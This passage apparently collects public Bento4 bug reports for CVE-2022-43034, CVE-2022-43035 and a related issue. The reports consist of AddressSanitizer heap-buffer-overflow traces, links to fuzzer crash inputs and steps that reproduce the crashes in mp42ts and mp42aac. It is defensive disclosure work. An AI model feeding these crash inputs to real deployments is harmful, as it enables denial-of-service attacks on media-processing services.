#14 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#15 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#16 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#17 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#18 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#19 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#20 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#21 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#22 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#23 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#24 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#25 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#26 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#27 0x51b986 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#28 0x4f5833 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#29 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#30 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#31 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#32 0x49cfb2 in AP4\_TrakAtom::AP4\_TrakAtom(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:165  
#33 0x4f7709 in AP4\_TrakAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4TrakAtom.h:58  
#34 0x4f7709 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:413  
#35 0x4fc596 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#36 0x51ac42 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#37 0x51ac42 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#38 0x430fac in AP4\_MoovAtom::AP4\_MoovAtom(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.cpp:80  
#39 0x4f5430 in AP4\_MoovAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4MoovAtom.h:56  
#40 0x4f5430 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:393  
#41 0x4fb65a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#42 0x4fb65a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154  
#43 0x41c6af in AP4\_File::ParseStream(AP4\_ByteStream&, AP4\_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104  
#44 0x41c6af in AP4\_File::AP4\_File(AP4\_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78  
#45 0x404446 in main /root/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511  
#46 0x7ffff61bb83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#47 0x40ae38 in \_start (/root/Bento4/mp42ts+0x40ae38)

0x60300000ec3c is located 0 bytes to the right of 28-byte region \[0x60300000ec20,0x60300000ec3c)  
allocated by thread T0 here:  
#0 0x7ffff6f03712 in operator new\[\](unsigned long) (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x99712)  
#1 0x419645 in AP4\_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210  
#2 0x419645 in AP4\_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Utils.cpp:564 AP4\_BitReader::SkipBits(unsigned int)  
Shadow bytes around the buggy address:  
0x0c067fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c067fff9d80: fa fa fa fa 00 00 00\[04\]fa fa 00 00 00 02 fa fa  
0x0c067fff9d90: 00 00 00 02 fa fa 00 00 00 fa fa fa 00 00 00 fa  
0x0c067fff9da0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00  
0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa  
0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa  
0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==10897==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/Bento4/mp42ts-hbo-00

**Validation steps**

git clone https://github.com/axiomatic-systems/Bento4  
cd Bento4/  
mkdir check\_build && cd check\_build  
cmake ../ -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="-fsanitize=address" -DCMAKE\_CXX\_FLAGS="-fsanitize=address" -DCMAKE\_BUILD\_TYPE=Release  
make -j  
./mp42ts mp42ts-hbo-00 /dev/null

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2022-43034: Heap-buffer-overflow with ASAN in mp42ts · Issue #764 · axiomatic-systems/Bento4

An issue was discovered in Bento4 v1.6.0-639. There is a heap-buffer-overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.

Hi, developers of Bento4:  
Thanks for your fix of issue #751  
In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output:

\==27304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ed28 at pc 0x0000005a64d9 bp 0x7fffffffb290 sp 0x7fffffffb280  
READ of size 1 at 0x60300000ed28 thread T0  
#0 0x5a64d8 in AP4\_Dec3Atom::AP4\_Dec3Atom(unsigned int, unsigned char const\*) /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161  
#1 0x5a6a62 in AP4\_Dec3Atom::Create(unsigned int, AP4\_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:56  
#2 0x508887 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769  
#3 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#4 0x579928 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#5 0x480e69 in AP4\_SampleEntry::Read(AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115  
#6 0x480e69 in AP4\_AudioSampleEntry::AP4\_AudioSampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420  
#7 0x480e69 in AP4\_Eac3SampleEntry::AP4\_Eac3SampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:752  
#8 0x508d6b in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:338  
#9 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#10 0x490228 in AP4\_StsdAtom::AP4\_StsdAtom(unsigned int, unsigned char, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101  
#11 0x491bd0 in AP4\_StsdAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57  
#12 0x50aaae in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458  
#13 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#14 0x577862 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#15 0x577862 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#16 0x5785a6 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#17 0x507f53 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#18 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#19 0x5aea82 in AP4\_DrefAtom::AP4\_DrefAtom(unsigned int, unsigned char, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84  
#20 0x5aeff7 in AP4\_DrefAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50  
#21 0x509882 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580  
#22 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#23 0x577862 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#24 0x577862 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#25 0x5785a6 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#26 0x507f53 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#27 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#28 0x577862 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#29 0x577862 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#30 0x5785a6 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#31 0x507f53 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#32 0x50ecb6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#33 0x577862 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#34 0x577862 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#35 0x5785a6 in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#36 0x507f53 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#37 0x50dd7a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#38 0x50dd7a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154  
#39 0x418daf in AP4\_File::ParseStream(AP4\_ByteStream&, AP4\_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104  
#40 0x418daf in AP4\_File::AP4\_File(AP4\_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78  
#41 0x4040d7 in main /root/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250  
#42 0x7ffff61bb83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#43 0x408508 in \_start (/root/Bento4/mp42aac+0x408508)

0x60300000ed28 is located 0 bytes to the right of 24-byte region \[0x60300000ed10,0x60300000ed28)  
allocated by thread T0 here:  
#0 0x7ffff6f03712 in operator new\[\](unsigned long) (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x99712)  
#1 0x4147b5 in AP4\_DataBuffer::AP4\_DataBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55  
#2 0x17 ()

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161 AP4\_Dec3Atom::AP4\_Dec3Atom(unsigned int, unsigned char const\*)  
Shadow bytes around the buggy address:  
0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 fa  
\=>0x0c067fff9da0: fa fa 00 00 00\[fa\]fa fa 00 00 00 fa fa fa 00 00  
0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa  
0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa  
0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00  
0x0c067fff9de0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa  
0x0c067fff9df0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==27304==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/Bento4/mp42aac-hbo-00

**Validation steps**

git clone https://github.com/axiomatic-systems/Bento4  
cd Bento4/  
mkdir check\_build && cd check\_build  
cmake ../ -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="-fsanitize=address" -DCMAKE\_CXX\_FLAGS="-fsanitize=address" -DCMAKE\_BUILD\_TYPE=Release  
make -j  
./mp42aac mp42aac-hbo-00 /dev/null

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2022-43035: Heap-buffer-overflow with ASAN in mp42aac · Issue #762 · axiomatic-systems/Bento4

Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadCache() function in mp42ts.

Hi, developers of Bento4:  
In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output. The output is different from #764

\=================================================================  
\==3902==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000df38 at pc 0x0000004a51a6 bp 0x7ffc109910f0 sp 0x7ffc109910e0  
READ of size 1 at 0x60400000df38 thread T0  
#0 0x4a51a5 in AP4\_BitReader::ReadCache() const /root/Bento4/Source/C++/Core/Ap4Utils.cpp:447  
#1 0x4a51a5 in AP4\_BitReader::ReadBits(unsigned int) /root/Bento4/Source/C++/Core/Ap4Utils.cpp:467  
#2 0x5405fc in AP4\_Dac4Atom::AP4\_Dac4Atom(unsigned int, unsigned char const\*) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:313  
#3 0x5423a2 in AP4\_Dac4Atom::Create(unsigned int, AP4\_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:58  
#4 0x4f47c5 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:776  
#5 0x4f955a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#6 0x51a25e in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#7 0x487d31 in AP4\_SampleEntry::Read(AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115  
#8 0x487d31 in AP4\_AudioSampleEntry::AP4\_AudioSampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420  
#9 0x487d31 in AP4\_Ac4SampleEntry::AP4\_Ac4SampleEntry(unsigned int, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:801  
#10 0x4f1aad in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:342  
#11 0x4f955a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#12 0x6134a9 in AP4\_StsdAtom::AP4\_StsdAtom(unsigned int, unsigned char, unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101  
#13 0x61534b in AP4\_StsdAtom::Create(unsigned int, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57  
#14 0x4f55a6 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458  
#15 0x4f955a in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#16 0x5181d5 in AP4\_ContainerAtom::ReadChildren(AP4\_AtomFactory&, AP4\_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194  
#17 0x5181d5 in AP4\_ContainerAtom::AP4\_ContainerAtom(unsigned int, unsigned long long, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139  
#18 0x518fce in AP4\_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4\_ByteStream&, AP4\_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88  
#19 0x4f2b69 in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816  
#20 0x4f865c in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, unsigned long long&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234  
#21 0x4f865c in AP4\_AtomFactory::CreateAtomFromStream(AP4\_ByteStream&, AP4\_Atom\*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154  
#22 0x41c87f in AP4\_File::ParseStream(AP4\_ByteStream&, AP4\_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104  
#23 0x41c87f in AP4\_File::AP4\_File(AP4\_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78  
#24 0x40441f in main /root/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511  
#25 0x7fb1c343783f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#26 0x40ad98 in \_start (/root/Bento4/mp42ts+0x40ad98)

0x60400000df38 is located 0 bytes to the right of 40-byte region \[0x60400000df10,0x60400000df38)  
allocated by thread T0 here:  
#0 0x7fb1c417f712 in operator new\[\](unsigned long) (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x99712)  
#1 0x4199e5 in AP4\_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210  
#2 0x4199e5 in AP4\_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Utils.cpp:447 AP4\_BitReader::ReadCache() const  
Shadow bytes around the buggy address:  
0x0c087fff9b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c087fff9be0: fa fa 00 00 00 00 00\[fa\]fa fa 00 00 00 00 06 fa  
0x0c087fff9bf0: fa fa 00 00 00 00 06 fa fa fa 00 00 00 00 00 00  
0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==3902==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/Bento4/mp42ts-hbo-01

**Validation steps**

git clone https://github.com/axiomatic-systems/Bento4  
cd Bento4/  
mkdir check\_build && cd check\_build  
cmake ../ -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="-fsanitize=address" -DCMAKE\_CXX\_FLAGS="-fsanitize=address" -DCMAKE\_BUILD\_TYPE=Release  
make -j  
